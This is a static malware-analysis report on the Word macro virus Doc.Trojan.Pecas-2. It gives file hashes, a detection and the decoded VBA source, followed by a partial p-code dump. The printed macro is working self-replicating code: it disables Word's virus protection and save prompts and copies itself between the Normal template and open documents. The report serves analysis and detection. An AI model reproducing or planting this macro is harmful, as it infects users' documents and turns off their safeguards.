Doc.Trojan.Pecas-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 cc9dd37306c60159…

MALICIOUS

Office (OLE)

27.5 KB Created: 2001-04-17 17:59:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8978a8fee8f11f7a9f50678a617bbc82 SHA-1: 80d1afc880b21462cafde0ebedca00124af71d14 SHA-256: cc9dd37306c601590d6d1fda919f20859c9579b75bdb0bdd4b9f0c62ac43fa7e
140 Risk Score

Malware Insights

Doc.Trojan.Pecas-2 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Pecas-2. It contains VBA macros that attempt to modify the Normal template and potentially spread to other documents. The macro also includes a hardcoded string 'pequitas te amo' which might be a lure or part of an obfuscation technique.

Heuristics 2

  • ClamAV: Doc.Trojan.Pecas-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pecas-2
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5490 bytes
SHA-256: b58d8a3b067139e082657adc259a776cb650fb999e2acddc0042fc569c1fcb2c
Detection
ClamAV: Doc.Trojan.Pecas-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Pecas"
Attribute VB_Base = "1Normal.Pecas"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'by morris "vegueta"
'pequitas es mi novia
'mi viejo amigo " goto"
'dedicado para ti pequitas
'este virus tiene un bug en mi siguiente version lo solucionare
Private Sub Document_Close()
On Error Resume Next
Application.ScreenUpdating = False
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Set plan = NormalTemplate.VBProject.VBComponents.Item(1)
Set activ = ActiveDocument.VBProject.VBComponents.Item(1)
Set temp = NormalTemplate.VBProject.VBComponents(1).CodeModule
bandera = 0
paso2:
cont = activ.CodeModule.countoflines
cont1 = plan.CodeModule.countoflines
var = plan.Name
If var = "Pecas" Then
  If activ.Name <> "Pecas" Then
   activ.CodeModule.DeleteLines 1, cont
    activ.CodeModule.InsertLines 1, temp.lines(1, cont1)
    activ.Name = plan.Name
      If bandera = 0 Then
      If InStr(1, ActiveDocument.Name, "Document") = 0 Then
        If Day(Now) = 13 Then Selection.TypeText "pequitas te amo"
       ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
       Else
       ActiveDocument.Saved = True
      End If
      End If
    End If
End If
bandera = bandera + 1
If bandera > 1 Then
Application.ScreenUpdating = False
Exit Sub
End If
Set activ = NormalTemplate.VBProject.VBComponents.Item(1)
Set plan = ActiveDocument.VBProject.VBComponents.Item(1)
Set temp = ActiveDocument.VBProject.VBComponents(1).CodeModule

GoTo paso2
End Sub

' Processing file: /opt/analyzer/scan_staging/deee8eb6b95b46209f0e5d85576b544f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Pecas - 3216 bytes
' Line #0:
' Line #1:
' 	QuoteRem 0x0000 0x0013 "by morris "vegueta""
' Line #2:
' 	QuoteRem 0x0000 0x0014 "pequitas es mi novia"
' Line #3:
' 	QuoteRem 0x0000 0x0016 "mi viejo amigo " goto""
' Line #4:
' 	QuoteRem 0x0000 0x0019 "dedicado para ti pequitas"
' Line #5:
' 	QuoteRem 0x0000 0x003E "este virus tiene un bug en mi siguiente version lo solucionare"
' Line #6:
' 	FuncDefn (Private Sub Document_Close())
' Line #7:
' 	OnError (Resume Next) 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #9:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #10:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #11:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #12:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set plan 
' Line #13:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set activ 
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set temp 
' Line #15:
' 	LitDI2 0x0000 
' 	St bandera 
' Line #16:
' 	Label paso2 
' Line #17:
' 	Ld activ 
' 	MemLd CodeModule 
' 	MemLd countoflines 
' 	St cont 
' Line #18:
' 	Ld plan 
' 	MemLd CodeModule 
' 	MemLd countoflines 
' 	St cont1 
' Line #19:
' 	Ld plan 
' 	MemLd New 
' 	St var 
' Line #20:
' 	Ld var 
' 	LitStr 0x0005 "Pecas"
' 	Eq 
' 	IfBlock 
' Line #21:
' 	Ld activ 
' 	MemLd New 
' 	LitStr 0x0005 "Pecas"
' 	Ne 
' 	IfBlock 
' Line #22:
' 	LitDI2 0x0001 
' 	Ld cont 
' 	Ld activ 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #23:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld cont1 
' 	Ld temp 
' 	ArgsMemLd lines 0x0002 
' 	Ld activ 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #24:
' 	Ld plan 
' 	MemLd New 
' 	Ld activ 
' 	MemSt New 
' Line #25:
' 	Ld bandera 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #26:
' 	LitDI2 0x0001 
' 	Ld ActiveDocu
... (truncated)